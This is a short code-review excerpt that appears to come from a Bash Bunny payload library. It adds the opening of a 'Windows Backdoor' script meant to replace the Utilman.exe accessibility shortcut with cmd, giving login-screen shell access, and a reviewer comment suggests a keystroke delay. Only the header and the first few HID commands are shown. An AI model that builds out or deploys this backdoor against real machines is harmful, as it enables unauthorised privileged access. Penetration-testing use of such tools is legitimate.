payloads/library/execution/Windows BackDoor/Payload.txt

```diff
@@ -0,0 +1,64 @@
+#!/bin/bash
+#
+# Title:         Windows Backdoor
+# Author:        Rogue(editor) Squibs(main Concept)
+# Version:       0.3
+# Plug2Pwn:		 18s
+#
+# Creates a backdoor by replacing the Utilman.exe file (Accessibility shortcut at login screen) with cmd
+#
+# Blue...............Preparing Attack
+# Yellow.............Attacking
+# Green..............GTFO
+
+#Open Admin Powershell 
+ATTACKMODE HID
+LED B 200
+Q GUI
```

Comment:
I would add a small delay before this so the target machine has time to recongize and accept keystrokes from the bash bunny. 

```
QUACK DELAY 1000
```